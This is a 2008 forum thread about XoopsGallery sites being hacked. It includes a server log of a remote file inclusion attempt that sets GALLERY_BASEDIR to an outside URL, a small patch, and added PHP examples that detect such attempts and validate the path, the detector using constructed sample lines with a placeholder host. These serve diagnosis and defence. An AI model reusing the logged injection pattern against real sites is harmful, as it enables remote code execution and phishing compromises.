1
Northern
XoopsGallery Easly Hacked
  • 2008/1/9 22:24

  • Northern

  • Just can't stay away

  • Posts: 420

  • Since: 2004/12/26


I just got done removing 8 phishing sites out of a single xoopsgallery folder. These little sites are like ticks, all over the place in oddball places, and not all of them seemed what they were.

I went to http://www.xoopsgallery.org but they seem to be closed or down at this time, as it was yesterday and the day prior.

I would advise you to check your xoopsgallery module: look through all folders and look for an all-CAPS (all upper-case lettered) folder; that would be the easiest way to find them.


This would be a wise thing to do since I've just finished with the 4th xoopsgallery with this problem in under 2 weeks. None of the sites are on the same servers or hosts; the versions of XOOPS gallery were 3.3.3.7, 3.3.3.9, and 2.1.

Flag it, bug it, report it, whatever you like, but it's become apparent that there's a problem.


Marc.

2
BlueStocking
Re: XoopsGallery Easly Hacked

TO:
QuarantinedModules

@Irmtfan, D. J.
I have NOT removed it from the SourceForge list. That is for your determination. Please let me know what you do.

Thanks,

QUESTION: http://www.dhps.ylc.edu.tw/~demo/x96/modules/fileup/view_file.php?fsn=3 should be warned. I do not speak the language. (Chinese)

Is this the same module that Northern just reported on?

BS
hhttps://xoops.org/modules/repository .. It is time to get involved - XOOPS.ORG

3
Northern
Re: XoopsGallery Easly Hacked
  • 2008/1/10 0:34

  • Northern

  • Just can't stay away

  • Posts: 420

  • Since: 2004/12/26


Quote:

BlueStocking wrote:
TO:
QuarantinedModules

@Irmtfan, D. J.
I have NOT removed it from the SourceForge list. That is for your determination. Please let me know what you do.



From the looks of things in xoopsinfo (click the link), Xoopsgallery has fallen into disrepair and is no longer.
It's now an orphan, along with the websites .org, .com.

I tried to contact Glen via email but I get my message back in under 2 sec. lol.


Quote:

QUESTION: http://www.dhps.ylc.edu.tw/~demo/x96/modules/fileup/view_file.php?fsn=3 should be warned. I do not speak the language. (Chinese)

Is this the same module that Northern just reported on?

BS



From the looks of the download file ( Xoopsgallery-1_3_3_7.zip ) it's the same module.

Update:
The most common ways for a phishing site to access your site are:
1. search box
2. javascript-from faulty html
3. faulty html


Now if you noticed, all versions of xoopsgallery have their own search box in the index page. I've just removed the search form in the templates, and chmod ( 444 ) the search.php file, then hid the search option in the xoops_version.php.

This is not a fix, but to help eliminate the problem. I've still got a lot of source checking to do.

4
EastEnd99
Re: XoopsGallery Easly Hacked
  • 2008/1/10 13:45

  • EastEnd99

  • Just popping in

  • Posts: 1

  • Since: 2005/9/4


This is a (sanitized) messages log from my webserver:
Jan  6 18:06:47 httpdPHP Warning:  main(): URL file-access is disabled in the server configuration in /..../modules/xoopsgallery/init_basic.php on line 83
Jan  6 18:06:47 httpdPHP Warning:  main(http://kamekfm.org/test.txt???platform/fs_unix.php): failed to open stream: no suitable wrapper could be found in ../modules/xoopsgallery/init_basic.php on line 83
Jan  6 18:06:47 httpdPHP Fatal error:  main(): Failed opening required 'http://kamekfm.org/test.txt???platform/fs_unix.php' (include_path='.:/usr/share/pear-addons:/usr/share/pear'in ../modules/xoopsgallery/init_basic.php on line 83


Line 83 of init_basic.php shows the $GALLERY_BASEDIR variable is replaced by an external URL at runtime. These external references vary each time. My knowledge of PHP is limited: I cannot figure out which code is responsible for the value of this variable at runtime. I am stuck.

Am I looking at the same hack situation?
If it is: The hack does not seem to have any consequences: I cannot find strange files inside the xoopsgallery directory structure. Maybe turning off URL file-access in the server's PHP configuration disables the hack. Another possibility may be that the hack check in each php file should be extended (it validates empty $GALLERY_BASEDIR variables) to make sure it is pointing to the local XOOPS installation.

If I can be of any help, please let me know.

EE99
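
Added example, not part of EastEnd99's post: a PHP script that picks include failures with a remote URL as target, like the ones in the log above, out of PHP error-log lines and reports the script, line and remote host. The function name find_remote_includes() is hypothetical, and the sample lines are constructed in the format shown above with remote.example as a placeholder host.

```php
<?php
// Added example, not from the thread. find_remote_includes() is a
// hypothetical name; the sample lines below are constructed.

/**
 * Find include/require failures whose target was a remote URL.
 * Returns [ "script:line" => ['hosts' => [...], 'lines' => n] ].
 */
function find_remote_includes(array $lines)
{
    $found = array();
    foreach ($lines as $line) {
        // The two messages PHP logs when an include target cannot be opened.
        if (!preg_match('~failed to open stream|Failed opening~', $line)) {
            continue;
        }
        // A local include carries no scheme; a URL here usually means a
        // request-supplied value reached the include path.
        if (!preg_match('~\b(?:https?|ftps?)://([^/\s\'"?)]+)~i', $line, $url)) {
            continue;
        }
        if (!preg_match('~\bin (\S+) on line (\d+)\s*$~', $line, $where)) {
            continue;
        }
        $key = $where[1] . ':' . $where[2];
        if (!isset($found[$key])) {
            $found[$key] = array('hosts' => array(), 'lines' => 0);
        }
        $found[$key]['hosts'][strtolower($url[1])] = true;
        $found[$key]['lines']++;
    }
    foreach ($found as $key => $hit) {
        $found[$key]['hosts'] = array_keys($hit['hosts']);
    }
    return $found;
}

// Constructed sample (remote.example is a placeholder host).
$f = '/srv/www/modules/xoopsgallery/init_basic.php on line 83';
$sample = array(
    "Jan  6 18:06:47 httpd: PHP Warning:  main(): URL file-access is disabled in the server configuration in $f",
    "Jan  6 18:06:47 httpd: PHP Warning:  main(http://remote.example/test.txt???platform/fs_unix.php): failed to open stream: no suitable wrapper could be found in $f",
    "Jan  6 18:06:47 httpd: PHP Fatal error:  main(): Failed opening required 'http://remote.example/test.txt???platform/fs_unix.php' (include_path='.:/usr/share/pear') in $f",
    "Jan  6 18:07:02 httpd: PHP Warning:  main(platform/missing.php): failed to open stream: No such file or directory in /srv/www/modules/other/index.php on line 12",
);
foreach (find_remote_includes($sample) as $where => $hit) {
    printf("%s  lines=%d  hosts=%s\n", $where, $hit['lines'], implode(',', $hit['hosts']));
}
```

The count is of log lines, not requests: one blocked attempt produces both a warning and a fatal error. Attempts that succeed because URL file-access is enabled leave no such lines at all.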

5
deano42
Re: XoopsGallery Easly Hacked
  • 2008/1/11 23:55

  • deano42

  • Just popping in

  • Posts: 13

  • Since: 2006/4/26


I've had the same issue this week, does anyone know where you can get the latest version of XOOPS Gallery now that the site is down? I have some repairing to do...

Thanks

Dean

6
script_fu
Re: XoopsGallery Easly Hacked

The best solution is not to use the module at all.

Try one that a dev still supports...

example

http://www.zoullou.net/

7
MadFish
Re: XoopsGallery Easly Hacked
  • 2008/1/12 6:46

  • MadFish

  • Friend of XOOPS

  • Posts: 1056

  • Since: 2003/9/27


XoopsGallery was well maintained for years, it is a shame if it is not maintained anymore.

This kind of thing is why XOOPS needs to designate some 'core modules', that will give users (especially business) some assurance of ongoing support.

8
bubuche93
Re: XoopsGallery Easly Hacked
  • 2008/1/12 15:01

  • bubuche93

  • Just popping in

  • Posts: 25

  • Since: 2006/11/19


Is XOOPS gallery the same as xcgallery?

9
pjeutr
Re: XoopsGallery Easly Hacked
  • 2008/1/12 21:07

  • pjeutr

  • Just popping in

  • Posts: 2

  • Since: 2005/11/8


Try adding the following at the top of init_basic.php.
Seems to work for me, dunno why it should be possible that the base can be a url.

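// Hack prevention.
// Abort if the request itself (GET, POST or cookie) supplies GALLERY_BASEDIR.
if (!empty($_REQUEST["GALLERY_BASEDIR"])) {
    // Record the attempted value in the PHP error log, then stop.
    error_log("Security violation\n" . $_REQUEST["GALLERY_BASEDIR"]);
    exit;
}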
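
Added example, not part of pjeutr's post or the XoopsGallery code: a stricter form of the check above that also does what EastEnd99 suggested earlier in the thread, accepting a base directory only if it resolves to a real directory inside the local installation. The helper name gallery_safe_basedir() and the $installRoot parameter are hypothetical; the demo builds a throwaway directory to stand in for the module folder.

```php
<?php
// Added example, not XoopsGallery code. gallery_safe_basedir() is a
// hypothetical helper; $installRoot stands for the module's own directory.

/**
 * Return $candidate as a canonical path with trailing separator if it is a
 * real directory inside $installRoot, otherwise null.
 */
function gallery_safe_basedir($candidate, $installRoot)
{
    // Same idea as the check above: the value must not arrive with the
    // request (register_globals would copy it into a global variable).
    foreach (array($_GET, $_POST, $_COOKIE) as $input) {
        if (isset($input['GALLERY_BASEDIR'])) {
            return null;
        }
    }
    // realpath('') returns the current directory, so reject empty input.
    if (!is_string($candidate) || $candidate === '') {
        return null;
    }
    // Anything with a scheme (http://, ftp://, php://, data:) is not a path.
    // Two or more characters before the colon, so "C:\..." is not caught.
    if (preg_match('~^[a-z][a-z0-9+.-]+:~i', $candidate)) {
        return null;
    }
    // realpath() resolves ".." and symlinks and fails on non-existent paths.
    $root = realpath($installRoot);
    $real = realpath($candidate);
    if ($root === false || $real === false || !is_dir($real)) {
        return null;
    }
    $root = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    $real = rtrim($real, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $root, strlen($root)) === 0 ? $real : null;
}

// Constructed demo: a throwaway directory stands in for the module folder.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'xg_demo_' . getmypid();
mkdir($root . '/platform', 0700, true);
$cases = array(
    $root . '/',                          // the root itself
    $root . '/platform/../',              // inside the root, via ".."
    'http://remote.example/test.txt???',  // URL shaped like the one in the log
    sys_get_temp_dir(),                   // parent of the root
);
foreach ($cases as $case) {
    $base = gallery_safe_basedir($case, $root);
    printf("%-40s => %s\n", $case, $base === null ? 'REJECTED' : $base);
}
rmdir($root . '/platform');
rmdir($root);
```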

10
BlueStocking
Re: XoopsGallery Easly Hacked

SEE News report

http://codex.gallery2.org/Main_Page

http://codex.gallery2.org/Gallery2ownload#Packages

http://codex.gallery2.org/Integration
SEE: [XOOPS Download CMS/Portal alpha G2.0(.x) greyhair]

Maybe the link above will help. I am not a module developer so I would not know for certain but it appears XOOPSGallery 2 was designed on this platform, so maybe you or someone will re-xoopsify it.

Sidenote: Beautiful Wiki support.
hhttps://xoops.org/modules/repository .. It is time to get involved - XOOPS.ORG
